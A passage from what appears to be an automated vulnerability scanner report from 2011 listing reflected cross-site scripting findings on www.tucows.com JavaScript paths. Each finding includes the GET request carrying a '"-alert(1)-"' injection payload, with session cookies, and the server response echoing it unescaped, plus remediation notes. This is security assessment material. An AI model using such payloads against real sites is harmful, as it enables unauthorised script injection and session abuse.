Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets189cd"-alert(1)-"ae1dffd01f2/includes/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.285. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1d9"-alert(1)-"aaec46b7783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes5b1d9"-alert(1)-"aaec46b7783/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes5b1d9"-alert(1)-"aaec46b7783/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.286. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d85f"-alert(1)-"b501c96f23 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js3d85f"-alert(1)-"b501c96f23/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js3d85f"-alert(1)-"b501c96f23/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.287. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a50d"-alert(1)-"addf45cb35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/x_core.js4a50d"-alert(1)-"addf45cb35 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/x_core.js4a50d"-alert(1)-"addf45cb35";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.288. http://www.tucows.com/images/newassets/includes/js/x_core.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77ea"-alert(1)-"c2c5c57e4b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/x_core.js?d77ea"-alert(1)-"c2c5c57e4b0=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/x_core.js?d77ea"-alert(1)-"c2c5c57e4b0=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.289. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52264"-alert(1)-"ba7b1f5ec8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images52264"-alert(1)-"ba7b1f5ec8f/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images52264"-alert(1)-"ba7b1f5ec8f/newassets/includes/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.290. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83368"-alert(1)-"1009c251c75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets83368"-alert(1)-"1009c251c75/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets83368"-alert(1)-"1009c251c75/includes/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.291. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d685f"-alert(1)-"468f4a77932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesd685f"-alert(1)-"468f4a77932/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesd685f"-alert(1)-"468f4a77932/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.292. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5e35"-alert(1)-"277a1eb2d25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/jsc5e35"-alert(1)-"277a1eb2d25/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/jsc5e35"-alert(1)-"277a1eb2d25/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.293. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b699"-alert(1)-"96b8d0b02cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/xdocsize.js6b699"-alert(1)-"96b8d0b02cb HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/xdocsize.js6b699"-alert(1)-"96b8d0b02cb";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.294. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5207"-alert(1)-"8d2e3d0b84e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/xdocsize.js?b5207"-alert(1)-"8d2e3d0b84e=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/xdocsize.js?b5207"-alert(1)-"8d2e3d0b84e=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.295. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 1]  previous  next

Summary

